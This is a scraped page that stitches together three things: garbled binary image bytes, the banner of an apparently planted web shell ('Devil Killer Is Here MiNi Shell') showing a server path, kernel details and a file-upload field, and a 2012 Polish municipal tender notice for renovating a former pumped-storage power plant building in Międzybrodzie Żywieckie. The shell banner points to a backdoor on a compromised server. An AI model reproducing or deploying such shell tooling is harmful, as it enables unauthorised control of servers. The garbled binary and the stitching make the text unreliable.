JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/320158-N-2012.html

<p class="kh_header"><b>Czernichów: Przebudowa i remont obiektu poprzemysłowego po elektrowni szczytowo-pompowej w Międzybrodziu Żywieckim na cele gospodarcze, kulturalne, społeczne, turystyczne i edukacyjne</b><br>
<b>Numer ogłoszenia: 320158 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Czernichów z/s w Tresnej , ul. Żywiecka 2, 34-311 Czernichów, woj. śląskie, tel. 033 8661325, faks 033 8661287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czernichow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont obiektu poprzemysłowego po elektrowni szczytowo-pompowej w Międzybrodziu Żywieckim na cele gospodarcze, kulturalne, społeczne, turystyczne i edukacyjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przebudowa i remont obiektu poprzemysłowego po elektrowni szczytowo-pompowej w Międzybrodziu Żywieckim na cele gospodarcze, 
kulturalne, społeczne, turystyczne i edukacyjne o parametrach:
- powierzchnia zabudowy - 1.144,50 m2,
- powierzchnia użytkowa - 1.534,35 m2,
- kubatura - 5.772,63 m3
Realizowany obiekt to budynek mieszczący się w Międzybrodziu Żywieckim przy ulicy Beskidzkiej. Budynek został wybudowany w latach 60 tych XX wieku, wzniesiony z przeznaczeniem do obsługi turystycznej odbywającej się w kierunku góry Żar. Stan techniczny poszczególnych elementów w budynku jest obecnie niezadowalający, na co wskazuje ekspertyza techniczna obiektu.
Do ustalonego z Zamawiającym zakresu działań wchodzi:
	- dostosowanie obiektu dla potrzeb osób niepełnosprawnych,
	- dostosowanie obiektu do wymogów przepisów ppoż.,
	-dostosowanie obiektu do wymogów przepisów SANEPID,
	-dostosowanie obiektu do wymogów przepisów BHP,
	-zagospodarowanie terenu wokół budynku
	-zadaszenie istniejących tarasów zewnętrznych powiększających kubaturę budynku oraz zmieniających jego wygląd i obrys zewnętrzny,
	-wymiana stropu tarasu (ekspertyza techniczna wykazała duże pęknięcia a co za tym idzie ugięcia i osłabienie nośności poprzez korozję zbrojenia),
	-wyrównanie oraz ujednolicenie poziomów użytkowych poszczególnych części budynku, tak aby obiekt był pozbawiony barier architektonicznych,
	-pogłębienie oraz doświetlenie piwnic budynku,
	-powiększenie przestrzeni piwnic poprzez adaptację części budynku nie podpiwniczonych,
	-przebudowa całkowita istniejącej klatki schodowej i przystosowanie jej do 
obowiązujących przepisów techniczno - budowlanych,
	-modernizacja piwnic budynku (powiększenie o przestrzenie dostępne jedynie poprzez klapy w stropie parteru),
	-wymiana pokrycia dachowego oraz ocieplenie całości obiektu,
	-zamkniecie przestrzeni otwartej i zaadoptowanie jej jako przestrzeni użytkowej wewnętrznej,
	-w miejscu zamkniętej przestrzeni byłej biblioteki stworzenie otwartej antresoli,
	-budowa schodów głównych od strony południowej znajdujących się pod 
przeszklonym dachem,
	-remont nawierzchni utwardzonych wraz z projektem nowych terenów służących obsłudze kuchni oraz dostępności dla niepełnosprawnych,
	-remont tarasu i zaadoptowanie jego części jako taras zielony,
	-przebudowa wewnętrznych instalacji sanitarnych oraz elektrycznych,
	-wykonanie świetlika dachowego znajdującego się w kalenicy głównego skrzydła opartego o podpory łukowe z drewna klejonego,
	-wzmocnienie konstrukcji nośnej stropów wewnętrznych.

1.	Dane dotyczące robót remontowo - budowlanych:
a)	Wyburzenia i demontaże,
	-wyburzenie ścianek działowych murowanych,
	-demontaż stolarki okiennej przeznaczonej do wymiany lub do likwidacji,
	-demontaż stolarki i ślusarki drzwiowej przeznaczonej do likwidacji,
	-demontaż wyposażenia WC i węzłów sanitarnych,
	-demontaż grzejników i instalacji c.o.
	-wyburzenie istniejących schodów zewnętrznych przeznaczonych do likwidacji
	-skucie wszystkich tynków wewnętrznych na ścianach, które pozostaną w budynku,
	-wykonanie przewodów wentylacji grawitacyjnej i wnęk na piony kanalizacji sanitarnej,
	-demontaż istniejących zabezpieczeń na ścianach budynku, wszelkich obróbek blacharskich, rur spustowych i istniejącej instalacji odgromowej,
	-demontaż stropodachu typu DZ,
	-skucie istniejących nadproży w miejscach zmiany wysokości parapetów 
projektowanych okien,
	-skucie istniejących ścianek attyki tarasu do wysokości płyty projektowanego stropu, skucie fragmentów ścian zewnętrznych w miejscach projektowanych otworów okiennych i drzwiowych lub ich poszerzeń,
	-skucie lub demontaż istniejących okładzin ściennych i kamiennych,
	-skucie istniejących posadzek.

b) Wymurowania i montaż
	-wykonanie podbicia fundamentów zgodnie z projektem konstrukcji,
	-wykonanie fundamentów w miejscach murowanych ścian nośnych zgodnie z projektem konstrukcji,
	-wykonanie ścianek fundamentowych wg wskazań na rysunkach konstrukcji,
	-wykonanie zabezpieczeń akustycznych z wełny mineralnej pionów kanalizacyjnych 
i obudowanie płytą gipsowo - kartonową wodoodporną,
	-wykonanie ścian nośnych na poziomie parteru z cegły ceramicznej, wg wskazań na rysunkach,
	-wykonanie ścianek działowych, wg wskazań na rysunkach,
	-zamurowanie lub podmurowanie otworów okiennych i drzwiowych wg wskazań narysunkach,
	-wykonanie schodów zewnętrznych wg wskazań na rysunkach oraz zgodnie z projektem konstrukcji,
	-wykonanie schodów wewnętrznych oraz projektowanej klatki schodowej wg wskazań na rysunkach oraz zgodnie z projektem konstrukcji,
	-wykonanie stropu międzykondygnacyjnego - płyty żelbetowej wg wskazań na rysunkach zgodnie z projektem konstrukcji,
	-wykonanie stropodachu nad salą wielofunkcyjną wg wskazań na rysunkach oraz zgodnie z projektem konstrukcji,
	-wykonanie centralnego świetlika ze szklanych elementów strukturalnych (np. firmy Aluprof lub równoważny) opartego na konstrukcji z drewna klejonego,
	-wykonanie stropodachu (odtworzenie kształtu) zdemontowanej części dachu zrealizowanej pierwotnie w systemie DZ wg wskazań na rysunkach oraz zgodnie z projektem konstrukcji,
	-wykonanie ścian strukturalnych w konstrukcji stalowo-aluminiowej (np. firmy Aluprof lub równoważny), (montaż i dobór profili wg zaleceń producenta),
	-montaż stolarki i ślusarki drzwiowej wewnętrznej,
	-montaż ślusarki drzwiowej zewnętrznej i okien w konstrukcji stalowo-aluminiowej,
	-montaż balustrad i poręczy,
	-wykonanie tynków wewnętrznych,	
-wykonanie posadzek wg wskazań na rysunkach,
	-ocieplenie ścian zewnętrznych ścian budynku płytami styropianowymi 
samogasnącymi gr. 15 cm; dobór grubości izolacji termicznej w sposób taki, aby 
ściana fundamentowa wraz z ocieploną ścianą zewnętrzną tworzyła jednolitą płasz-czyznę. Sposób mocowania, wzmocnienia krawędzi i inne detale konstrukcyjne - wg rozwiązań katalogowych producenta systemu. Tynkowanie tynkiem sylikatowym.
	-ocieplenie ościeży okiennych i drzwiowych styropianem gr. 3cm,
	-wykonanie odprowadzeń wód opadowych (rynny i rury spustowe) budynku wg wskazań na rysunkach.
	-realizacja w wyznaczonych pomieszczeniach (zaplecze kuchenne i otwarta sala bufetu) transportu pionowego w postaci dwóch małych dźwigów towarowych o udźwigu do 100 kg i platformy osobowej przystosowanej do transportu osób niepełnosprawnych. 

Uwaga:
Wszelkie elementy szklane projektuje się jako szkło bezpieczne hartowane lub klejone (laminowane).
Zamówienie drzwi i ich elementów należy wykonać dopiero po zweryfikowaniu 
faktycznych wymiarów uzyskanych na budowie.

c) Fundamenty, izolacja fundamentów
Projektowane fundamenty - wylewane, żelbetowe wg projektu konstrukcji.
Fundamenty zewnętrzne należy izolować przeciwwilgociowo i termicznie.
Ławy zewnętrzne fundamentowe, istniejące, wykonane jako betonowe, należy odkopać i zastosować drenaż pasmowy z rur drenarskich ssących i wprowadzić do studzienek rewizyjnych zamkniętych szczelną pokrywą.
Studzienki powinny być włączone do ogólnospławnej kanalizacji deszczowej znajdującej się na terenie inwestora oraz będącego jego własnością. W miejscach narożników zaopatrzonych w rury spustowe, wodę z drenażu odprowadzić wspólnie z wodą z rur spustowych i wprowadzić poprzez studzienki drenażowe do kanalizacji opadowej. 
Adaptacja części pomieszczeń, dotychczas niepodpiwniczonych, wymaga osuszenia murów obecnie zawilgoconych.
Właściwe zabezpieczenie ścian fundamentowych należy wykonać trzystopniowo:
Pierwszy stopień to zabezpieczenie fundamentów przed zewnętrznym wpływem wilgoci. 
Odbywa się to przez naniesienie na pionowe ściany płynnej hydroizolacji. W odróżnieniu od hydroizoalcji arkuszowych, płynne masy bitumiczne mają tą przewagę, że tworzą jednolitą równomierną powłokę wypełniającą wszystkie nierówności i szczeliny.
Drugim krokiem jest przyklejenie wodoodpornych płyt izolacyjnych. Najlepszym materiałem do tego celu jest polistyren ekstrudowany ( w skrócie XPS). Jest to materiał o strukturze 
zamknięto komórkowej, przez co jest  odporny na zawilgocenie, a zatem także na cykle mrozowe. Dodatkowo wysoka wytrzymałość mechaniczna tego materiału stanowi doskonałe zabezpieczenie warstwy hydroizoalcji i przyczynia się do oszczędności czasu pracy przy robotach ziemnych. Płyty z polistyrenu ekstrudowanego mogą być bezpośrednio zasypywane ziemią, bez obaw, można też prowadzić mechaniczne prace mające na celu zagęszczenie gruntu. Montaż płyt izolacyjnych, może odbywać się bezpośrednio za pomocą masy
 izolacyjnej lub można stosować metodę na placki.
Należy przy tym pamiętać, aby stosować masy i kleje pozbawione rozpuszczalników 
organicznych, które mogą wchodzić w reakcję z polistyrenem. Nie należy stosować 
łączników mechanicznych, gdyż ich  montaż powoduje uszkodzenie warstwy hydroizolacji.
Kolejnym krokiem jest wykonanie odwodnienia pasmowego budynku. Ma ono na celu 
odprowadzenie nadmiaru wilgoci gromadzącej się w gruncie wokół budynku. W tym 
przypadku płyty z polistyrenu ekstrudowanego również dobrze spełniają swoje zadanie gdyż ich powierzchnia ułatwia spływ wilgoci do ciągów drenażowych.
Zalecana przez producentów grubość izolacji waha się pomiędzy 6-10 cm. Wysokość izolacji jest zależna od zagłębienia ław fundamentowych budynku w gruncie. Najlepszym rozwiązaniem jest, gdy izolacja fundamentu ponad gruntem w sposób ciągły przechodzi w izolację ściany budynku. Unika się w ten sposób zbędnych mostków termicznych.

d) Przeciwwilgociowa izolacja pozioma ścian zewnętrznych piwnic
W starych budynkach nieposiadających poziomej izolacji wodoszczelnej problem stanowi zjawisko kapilarnego podciągania wilgoci w zawilgoconych ścianach piwnicznych. Osuszanie budynków jest również konieczne w sytuacji, gdy uszkodzona została izolacja pozioma budynku a jej odbudowa nie jest możliwa bez ogromnej ingerencji w konstrukcję.
Skutecznym sposobem zabezpieczenia przeciwwilgociowego w budynkach istniejących jest wykonywanie poziomej przepony przeciwwilgociowej.
Metoda iniekcji krystalicznej polega na wierceniu z zachowaniem równych odstępów głębokich otworów w ścianach budynku. Do otworów wprowadza się wodny roztwór cementu portlandzkiego zmieszanego z mineralnym środkiem aktywacyjnym w odpowiednio dobranych proporcjach. Proporcje te zależą od ilości oraz składu chemicznego soli zawartych w zawilgoconej ścianie. Nierozpuszczalny środek aktywacyjny, krystalizując - tworzy 
nieprzepuszczalną, trwałą warstwę izolacyjną. Proces ten trwa około tygodnia.
Iniekcja preparatów może być wykonana metodą ciśnieniową (iniekcja w poziomie, odwierty o średnicy 18 mm, rozmieszczone, co 10 - 12,5 cm) lub grawitacyjną (preparat wlewany w otwory o średnicy 30 mm, rozmieszczone, co 15 cm).
Do zastosowania tej metody konieczna jest wentylacja osuszanych pomieszczeń.
Na całkowite wyschnięcie ścian i rozpoczęcie prac tynkarskich trzeba czekać około dwóch miesięcy.

e) Ściany fundamentowe, ściany piwnic
Istniejące ściany konstrukcyjne zewnętrzne i wewnętrzne betonowe o grubości 30 cm. Ubytki w ścianach należy uzupełnić cegłą pełną o tych samych parametrach technicznych.
W miejscach gdzie projektuje się pogłębienie całości przestrzeni piwnicznych, należy skuć istniejące warstwy wykończeniowe oraz odsadzki fundamentów zewnętrznych i wewnętrznych a następnie podbić fundamenty. Ściany należy przedłużyć np. poprzez zastosowanie systemu stelaży stalowych z wypełnieniem betonem zbrojonym tak wysoko, aby osiągnąć minimalną zakładaną wysokość określoną w projekcie.Projektuje się założenie izolacji przeciwwodnej na całości ścian zewnętrznych oraz pod powierzchnią posadzki piwnic.
Projektuje się doświetlenie kondygnacji przyziemia (pomieszczenia piwniczne), zapewniające odpowiednią ilość światła dziennego do pomieszczeń przeznaczonych na pobyt ludzi, w postaci dodatkowych otworów okiennych usytuowanych pod stropem.
Wszystkie zewnętrzne ściany należy ocieplić stosując płyty styropianowe samogasnące EPS70 łączone na pióro i wpust gr. 15 cm.

f) Ściany wewnętrzne
Przewidziano adaptację części wewnętrznych ścian konstrukcyjnych, które uzupełniono 
układem słupów i trzonów żelbetowych wg szczegółowych dyspozycji w projekcie 
konstrukcji.
Przewidziano do wykonania ściany działowe tradycyjne oraz rozwiązania systemowe (płyty G-K) spełniające określone zadania we wnętrzu obiektu. Dla ścian o grubości 12 cm 
projektuje się ściany działowe np. z bloczków gazobetonowych lub ceramicznych z 
zastosowaniem systemowych nadproży.
Jako zamknięcia przestrzeni kondygnacyjnych stosuje się ścianki szklane z zastosowaniem szkła EI 60. Wszelkie elementy szklane projektuje się jako szkło bezpieczne hartowane lub klejone (laminowane). Wszelkie przeszklenia zewnętrzne projektuje się jako szklenie strukturalne oparte na profilach stalowo - aluminiowych.
Szklenie zewnętrzne należy wykonać ze szkła niskoemisyjnego zapewniającego odpowiedni komfort cieplny w budynku.
Ścianki przeszklone oddzielenia przeciwpożarowego stosować jako systemowe np. firmy Saint - Gobain lub równoważny lub innej spełniającej warunek PPOŻ. Szklenie zastosowane w ściankach powinno być przezierne w min. 90%. Profile nośne ścianek PPOŻ należy wykonać jako stalowo-aluminiowe.
Ścianki mające za zadanie oddzielenie od siebie poszczególnych części budynku, dla których ze względu na ochronę PPOŻ odporność nie jest wymagana, projektuje się jako samonośne ze szkleniem o przejrzystości 90%.
Dekoracyjne obramowania okienne na elewacji, projektuje się w postaci elementów 
wykształconych ze styropianu o podwyższonej wytrzymałości mechanicznej lub szkła piankowego.
Ponadto fragmenty ścian zewnętrznych projektuje się wykończyć od zewnątrz płytkami gresowymi kamieniopodobnymi.
Pozostałe elementy wykończenia elewacji wg opisu na rysunkach.


g) Stropy
Projektowane stropy - żelbetowe, płytowo - belkowe, zbrojone jedno i dwukierunkowo oraz płyty krzyżowo zbrojone wg projektu konstrukcji.

h) Dachy, konstrukcja dachu
Dach odtwarzany w miejscu stropodachu DZ -konstrukcja wykonana w postaci rusztu 
utworzonego z dźwigarów nośnych i poprzecznic z elementów z drewna klejonego wg 
projektu konstrukcji. Dach nad częścią nowoprojektowaną oparty na dźwigarach z drewna klejonego. Na elementach konstrukcyjnych przewidziano tarczę z płyt OSB mocowaną 
bezpośrednio do elementów drewnianych. Pokrycie w postaci papy termozgrzewalnej 
klejonej do podłoża, wykończenie zewnętrzne - gont bitumiczny.
Szczegółowy układ warstw zamieszczony jest na rysunkach.

i) Roboty wykończeniowe zewnętrzne
	-odwodnienie połaci dachowych za pomocą rynien wraz z systemem rur spustowych.
	-obróbki blacharskie z blachy stalowej, ocynkowanej, powlekanej w kolorze brązowym,
	-parapety systemowe odpowiednie do zastosowanej stolarki aluminiowej,
	-stolarka i ślusarka okienna i drzwiowa wg zestawienia,
	-schody zewnętrzne:
	-na nawierzchnię podestu i spoczniki schodów zewnętrznych zastosować 
antypoślizgową, ryflowaną, mrozoodporną płytką typu gres,
	-na stopnie schodów zewnętrznych zastosować antypoślizgową, mrozoodporną płytką typu Gres Stopień,
	-okładzina części bocznej (płaszczyzny pionowe) - tynk sylikatowy strukturalny 
w kolorze białym,
	-balustrady i poręcze ze stali nierdzewnej,
	-wycieraczki zewnętrzne przed wejściami - wycieraczki (np. typu plaster miodu) wpuszczone w warstwy posadzkowe,
	-okładziny ścian wg rysunku elewacji.

UWAGI DO REALIZACJI INWESTYCJI:

Podstawę realizacji poszczególnych części robót i zasady ich wykonania zawarte są 
w szczegółowych specyfikacjach technicznych (SST), z których wynikają poniższe wymogi:
	-w trakcie budowy należy na bieżąco prowadzić dziennik budowy,
	-budowa powinna być prowadzona pod nadzorem kierownika budowy,
	-wytyczenie oraz ustalenia charakterystyczne poziomów terenu projektowanego 
i otaczającego powinien wykonać uprawniony geodeta potwierdzając tę czynność wpisem do dziennika budowy,
	-wszystkie prace rozbiórkowe i wyburzeniowe należy prowadzić tak, aby nie naruszyć konstrukcji nośnej budynku,
	-roboty ziemne wykonywane w bezpośrednim sąsiedztwie sieci teletechnicznych 
i elektrycznych należy wykonywać ręcznie z należytą uwagą aby nie doszło do 
uszkodzenia,
	-wykonanie wszelkiego rodzaju instalacji t.j. instalacji elektrycznej, wodociągowej, odgromowej itp. należy zlecić wykonawcom posiadającym odpowiednie uprawnienia,
	-wszystkie roboty należy wykonywać zgodnie z zasadami BHP i Prawa Budowlanego, Polskimi Normami, Warunkami technicznymi wykonania i odbioru robót, budowlano-montażowych, Szczegółowymi Specyfikacjami Technicznymi oraz zasadami wiedzy i sztuki budowlanej pod nadzorem osób uprawnionych,
	-podani producenci rozwiązań systemowych są jedynie przykładowymi; wykonawca może zastosować produkty innych producentów lub zamienne rozwiązania pod warunkiem zachowania parametrów technicznych i estetycznych zawartych w projekcie oraz pisemnej akceptacji autora niniejszej dokumentacji i inspektora nadzoru inwestorskiego,
	-wszystkie materiały budowlane użyte do realizacji inwestycji powinny posiadać odpowiednie Aprobaty Techniczne (AT), atesty i dopuszczenia do stosowania w budownictwie,
	-wszelkie elementy ruchome, elementy wyposażenia, w szczególności elementy stolarki i ślusarki okiennej i drzwiowej, szkleń, fasad, okładzin elewacyjnych, balustrad, poręczy i pochwytów, odbojników wewnętrznych i innych należy zamawiać i wykonywać  montować na podstawie zweryfikowanych obmiarów rzeczywistych wykonanych na obiekcie,
	-realizacja białego montażu winna być poprzedzona zgłoszeniem wszystkich rozwiązań w zakresie ceramiki sanitarnej oraz armatury do akceptacji Inspektora Nadzoru i Jednostki Projektowej. Rozlokowanie ceramiki i akcesoriów może mieć istotny wpływ na rozmieszczenie ceramiki ściennej, dlatego te dwa elementy należy ze sobą szczególnie precyzyjnie skoordynować.
	-wszystkie wymiary należy sprawdzać na budowie z uwagi na mogące wystąpić niedokładności pomiarowe wynikające z braku dostępu do elementów konstrukcyj-nych.

2.	Projekt realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. Priorytet VI Zrównoważony rozwój miast. Działania 6.2. Rewitalizacja obszarów zdegradowanych. Poddziałanie 6.2.2. Rewitalizacja - małe miasta nr projektu 1080.
3.	Przedmiot zamówienia opisany został szczegółowo w następujących załącznikach do SIWZ:
1)	Projekt Wykonawczy - część architektoniczna, 
2)	Projekt Wykonawczy - część konstrukcyjna, 
3)	Projekt Wykonawczy - część instalacyjna wodna i kanalizacyjna, 
4)	Projekt Wykonawczy - cześć instalacyjna centralnego ogrzewania, 
5)	Projekt Wykonawczy - cześć instalacyjna wentylacyjna i klimatyzacyjna,
6)	 Projekt Wykonawczy - cześć instalacyjna elektryczna wewnętrzna i zewnętrzna z iluminacją obiektu, 
7)	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych,
8)	przedmiar robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.12.91-4, 45.33.20.00-3, 45.33.11.00-7, 45.33.11.10-0, 45.33.12.00-8, 45.31.00.00-3, 45.31.23.10-3, 45.31.57.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 250 000,00 zł (słownie złotych: dwieście pięćdziesiąt tysięcy złotych 00100 ) 
2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości (Dz. U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Porąbce nr 68 8124 0009 2001 0000 0172 0003. Kserokopię dowodu wpłaty wadium (polecenie przelewu) należy dołączyć do oferty.
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium
 przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego:
Urząd Gminy Czernichów z/s w Tresnej, ul. Żywiecka 2 , 34-311 Czernichów 
w pok. 22, a kserokopię dokumentu poświadczoną za zgodność z oryginałem 
należy załączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta 
zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww warunku wykonawcy udokumentują wykonanie w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na budowie, modernizacji lub remoncie obiektu użyteczności publicznej o powierzchni użytkowej nie mniejszej niż 1500m2 
i kubaturze 5000,00m3 . Dodatkowo, Wykonawca wykaże, że w okresie jw. Uzyskał 
doświadczenie w zakresie realizacji i montażu konstrukcji z elementów z drewnianych 
klejonych i przeszkleń fasadowych o powierzchni przeszkleń nie mniejszej niż 200 m2 oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
